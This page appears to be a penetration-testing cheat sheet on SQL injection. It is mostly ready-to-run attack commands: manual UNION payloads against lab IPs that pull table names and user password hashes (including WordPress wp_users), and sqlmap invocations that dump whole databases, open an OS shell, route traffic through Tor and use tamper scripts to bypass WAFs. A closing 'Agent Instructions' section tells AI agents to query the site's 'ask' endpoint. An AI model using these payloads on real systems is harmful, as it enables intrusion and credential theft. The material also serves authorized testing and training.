# SQL Injection

## Manual tests

```
 http://10.11.15.137/comment.php?id=756'
 http://10.11.15.137/comment.php?id=756 order by 7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,6,7
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,table_name,7 from information_schema.tables
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,column_name,7 from information_schema.columns where table_name='users'
 http://10.11.15.137/comment.php?id=756 union all select 1,2,4,5,concat(name,0x3a,password),7 FROM users

http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 union all select 1
http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat(user_login,0x3a,user_pass)+from+wp_users
```

## SQLmap 101

### Simple Usage

If you don’t know anything about the target site then use the normal command first, Observe if the sqlmap found something juicy for you

```
sqlmap -u “https://target_site.com/page/”
```

### Automatic GET request parameter

```
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”
```

### Specify the GET request parameters to Exploit

You can specify on which parameter you want to check or exploit the sql injection using just “-p” flag.

```
sqlmap -u “https://target_site.com/page?p1=value1&p2=value2” -p p1
```

### Use POST requests (Test All parameters)

```
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"
```

### SQLMap Request file as input

You can specify a request file containing the HTTP request, You can get it quickly from BurpSuite.

```
sqlmap -r request.txt
```

Here you can specify the targeted parameter or sqlmap will recognize and will test for all the parameters found.

**Specify Custom Position in HTTP request file**

You can use asterisk sign(**\***) to specify which parameter to attack or which place of the request to be attacked. You can specify or mark any part of the request by this method.

### Use Authenticated Session With Cookie

```
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"
```

### Use Authenticated Session with Auth Headers

```
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"
```

### Basic Authentication

```
sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password
```

### Use Previously created Session as SQLmap input (-s)

If you got SQL injection positive somewhere, then sqlmap will automatically create a session file(.sqlite) for later use. Now, If you want to try some other commands later, you can use the session file directly (It will save your time to re-try all the possible payloads and identify the vulnerability and all.)

```
sqlmap -u “https://target_site.com/page?p1=value1" -s SESSION-FILE.sqlite --dbs
```

You can use this file from the home path of sqlmap tool’s output directory.

## Post Exploitation Commands

If the SQL injection vulnerability observed positive then you can use the following commands to Exploit the SQL injection vulnerability.

### List the Databases

```
sqlmap -u “https://target_site.com/page?p1=value1” --dbs
```

### List Tables of Database TARGET\_DB

```
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables
```

### List Columns of Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns
```

### Dump Specific Data of Columns of Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump
```

### Fully Dump Table TARGET\_TABLE of Database TARGET\_DB

```
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump
```

### Dump full Database

```
sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump
```

### Custom SQL query

```
sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"
```

### Get OS Shell

```
sqlmap -u “https://target_site.com/page?p1=value1” --os-shell
```

### Get SQL shell

```
sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell
```

## SQLMap Proxy

### Proxy through Burpsuite

```
sqlmap -u “https://target_site.com/page?p1=value1” --proxy="http://127.0.0.1:8080/"
```

### Use Tor Socks5 proxy

```
sqlmap -u “https://target_site.com/page?p1=value1” --tor --tor-type=SOCKS5 --check-tor --dbs
```

## Extra

### Specify The Database Type

```
sqlmap -u “https://target_site.com/page?p1=value1” --dbms=mysql
```

You can use other DBMS types like *MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, Percona, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase*, etc.

### Attack Techniques

**–technique** Specify a letter or letters of **BEUSTQ** to control the exploit attempts:

* **B**: Boolean-based blind
* **E**: Error-based
* **U**: Union query-based
* **S**: Stacked queries
* **T**: Time-based blind
* **Q**: Inline queries

```
sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ
```

### Specify the Injection Techniques

You can specify the difficulty levels using two flags,

1. –level = LEVEL     Level of tests to perform (1-5, default 1)
2. –risk=RISK         Risk of tests to perform (0-3, default 1)

```
sqlmap -u “https://target_site.com/page?p1=value1” --risk=3 --level=5
```

**Option: `--risk`**

This option requires an argument that specifies the risk of tests to perform. There are **three** risk values.

**–riks=1**: 1 is default value which is for the majority of SQL injection points.

**–riks=2**: Adds to the default level the tests for heavy query time-based SQL injections

**–riks=3**: Value 3 adds also `OR`-based SQL injection tests.

**Option: `--`level**

When the value of `--level` is >= **2** it tests also HTTP *`Cookie`* header values. When this value is >= **3** it tests also HTTP *`User-Agent`* and HTTP *`Referer`* header value for SQL injections.

### `Use` Default Options for the process

Use **–batch** flag to use all the default options or used for non-interactive sessions. (By specifying –batch flag, sqlmap will not ask you for the (Y/N) choice rather then it will smartly choose according to the needs.)

```
sqlmap -u “https://target_site.com/page?p1=value1” --batch
```

### **–force-ssl** flag

Force SQLmap to use SSL or TLS for its requests.

Error: Can’t establish SSL connection

If you getting the following error during testing then you can use the flag **–force-ssl** to force SQLMap to use SSL or TLS.

### Tamper Scripts

You can use the tamper scripts to **bypass WAF** or to **modify the payload**. You can use multiple tampering scripts at once using **–tamper** flag.

```
sqlmap -u “https://target_site.com/page?p1=value1” --tamper=charencode
```

#### For General Perpose Usecase:

```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

#### MSSQL:

```
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dsash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
```

#### MySQL:

```
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
```

OR You can create your own Custom Tamper script to overcome the issue of some type of Encrypted payloads like AES, DES, Hashing, etc. 

{% embed url="<https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet>" %}

![](/files/DQOIji5R2fN3jJn59ekP)

{% embed url="<https://thedarksource.com/sqlmap-cheat-sheet/>" %}

{% embed url="<https://www.exploit-db.com/papers/13045>" %}

{% embed url="<https://sqlwiki.netspi.com/detection#mysql>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.